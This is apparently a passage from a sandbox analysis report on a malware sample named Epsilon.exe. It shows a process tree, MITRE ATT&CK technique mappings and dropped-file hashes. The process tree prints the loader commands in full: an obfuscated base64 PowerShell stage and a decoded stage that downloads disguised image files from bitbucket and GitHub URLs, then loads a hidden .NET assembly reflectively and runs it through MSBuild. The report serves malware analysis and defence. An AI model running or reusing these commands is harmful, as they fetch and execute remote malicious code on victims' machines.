      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$I$$9$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBT$HU$YgBz$HQ$cgBp$G4$Zw$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$s$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$C$$PQBb$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$V$Bv$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$BC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$RgBy$G8$bQBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$p$Ds$I$$g$C$$J$B0$GU$e$B0$C$$PQ$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$Ds$I$$k$Gw$bwBh$GQ$ZQBk$EE$cwBz$GU$bQBi$Gw$eQ$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$UgBl$GY$b$Bl$GM$d$Bp$G8$bg$u$EE$cwBz$GU$bQBi$Gw$eQBd$Do$OgBM$G8$YQBk$Cg$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$p$Ds$I$$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$C$$PQBb$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$V$Bv$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$BC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$9$C$$RwBl$HQ$LQBD$G8$bQBw$HI$ZQBz$HM$ZQBk$EI$eQB0$GU$QQBy$HI$YQB5$C$$LQBi$Hk$d$Bl$EE$cgBy$GE$eQ$g$CQ$ZQBu$GM$V$Bl$Hg$d$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B0$Hk$c$Bl$C$$PQ$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C4$RwBl$HQ$V$B5$H$$ZQ$o$Cc$d$Bl$HM$d$Bw$G8$dwBl$HI$cwBo$GU$b$Bs$C4$S$Bv$GE$YQBh$GE$YQBh$HM$Z$Bt$GU$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bm$HM$ZwBl$GQ$Z$Bk$GQ$Z$Bk$GQ$YQ$n$Ck$LgBJ$G4$dgBv$Gs$ZQ$o$CQ$bgB1$Gw$b$$s$C$$WwBv$GI$agBl$GM$d$Bb$F0$XQ$g$Cg$Jw$g$HQ$e$B0$C4$awBG$GM$Z$Bp$G0$YQ$v$HM$Z$Bh$G8$b$Bu$Hc$bwBk$C8$cgBl$Hc$cgB3$GU$dQ$v$HQ$ZQBy$HI$dwBx$GU$dw$v$Gc$cgBv$C4$d$Bl$Gs$YwB1$GI$d$Bp$GI$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$TQBz$GI$dQBp$Gw$Z$$n$Cw$I$$n$D$$Jw$p$Ck$fQB9$$==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2348
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.kFcdima/sdaolnwod/rewrweu/terrwqew/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2480
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
        6⤵
        
        PID:1608
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
        6⤵
        
        PID:3268

C:\Users\Admin\Downloads\Epsilon\Epsilon.exe
"C:\Users\Admin\Downloads\Epsilon\Epsilon.exe"
1⤵
PID:3492
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c 677ebc888e619.vbs
  2⤵
  PID:4864
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\677ebc888e619.vbs"
    3⤵
    PID:832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$I$$9$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBT$HU$YgBz$HQ$cgBp$G4$Zw$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$s$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$C$$PQBb$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$V$Bv$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$BC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$RgBy$G8$bQBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$p$Ds$I$$g$C$$J$B0$GU$e$B0$C$$PQ$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$Ds$I$$k$Gw$bwBh$GQ$ZQBk$EE$cwBz$GU$bQBi$Gw$eQ$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$UgBl$GY$b$Bl$GM$d$Bp$G8$bg$u$EE$cwBz$GU$bQBi$Gw$eQBd$Do$OgBM$G8$YQBk$Cg$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$p$Ds$I$$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$C$$PQBb$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$V$Bv$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$BC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$9$C$$RwBl$HQ$LQBD$G8$bQBw$HI$ZQBz$HM$ZQBk$EI$eQB0$GU$QQBy$HI$YQB5$C$$LQBi$Hk$d$Bl$EE$cgBy$GE$eQ$g$CQ$ZQBu$GM$V$Bl$Hg$d$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B0$Hk$c$Bl$C$$PQ$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C4$RwBl$HQ$V$B5$H$$ZQ$o$Cc$d$Bl$HM$d$Bw$G8$dwBl$HI$cwBo$GU$b$Bs$C4$S$Bv$GE$YQBh$GE$YQBh$HM$Z$Bt$GU$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bm$HM$ZwBl$GQ$Z$Bk$GQ$Z$Bk$GQ$YQ$n$Ck$LgBJ$G4$dgBv$Gs$ZQ$o$CQ$bgB1$Gw$b$$s$C$$WwBv$GI$agBl$GM$d$Bb$F0$XQ$g$Cg$Jw$g$HQ$e$B0$C4$awBG$GM$Z$Bp$G0$YQ$v$HM$Z$Bh$G8$b$Bu$Hc$bwBk$C8$cgBl$Hc$cgB3$GU$dQ$v$HQ$ZQBy$HI$dwBx$GU$dw$v$Gc$cgBv$C4$d$Bl$Gs$YwB1$GI$d$Bp$GI$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$TQBz$GI$dQBp$Gw$Z$$n$Cw$I$$n$D$$Jw$p$Ck$fQB9$$==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4084
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.kFcdima/sdaolnwod/rewrweu/terrwqew/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2840
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
        6⤵
        
        PID:2852
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
        6⤵
        
        PID:3440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4c1a24fa898d2a98b540b20272c8e47b

SHA1
3218bff9ce95b52842fa1b8bd00be073177141ef

SHA256
bbcc378fcbf64580e7a48b4e7ca9be57fa0a1f2e747f488325685bdb18d73a95

SHA512
e61f196e7f1c9a5fe249abe9b11eea770fb2f4babc61f60b12c71f43e6fe9354cf14869daf46abc2c2655bce180252acd43c10562a2dcd31fa7d90d33253820e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f1d2c7fd2ca29bb77a5da2d1847fbb92

SHA1
840de2cf36c22ba10ac96f90890b6a12a56526c6

SHA256
58d0f80310f4a84f687c5ce0adaa982eb42fe4480510399fa2ae975d40bb8bc5

SHA512
ede1fafea2404f16948fe0b5ea5161ccee3ee6e40c55ff98c337eac981a6776b9c73dc030a5c59e4347aec91259f497539206e71949c33adcecbf2c846709e14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e3d847378d65f135edbb000429172ba1

SHA1
f3ec3f72fe676df36a2161a692d352fe93ae6f23

SHA256
822ff8a4fb672b3ff6d993c7e474c080def7d90c15f29d32b729d48bf2a8082e

SHA512
860085d0cdaf753ce82ab308d7eee266536ab280267b83192161b2a6334fb029695cdfaa1e919c35e48f98e37bc5947c4809970bb2c46b77f35dc5af48718880

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
81bb1a727cbf56e80a19587e57fbbbba

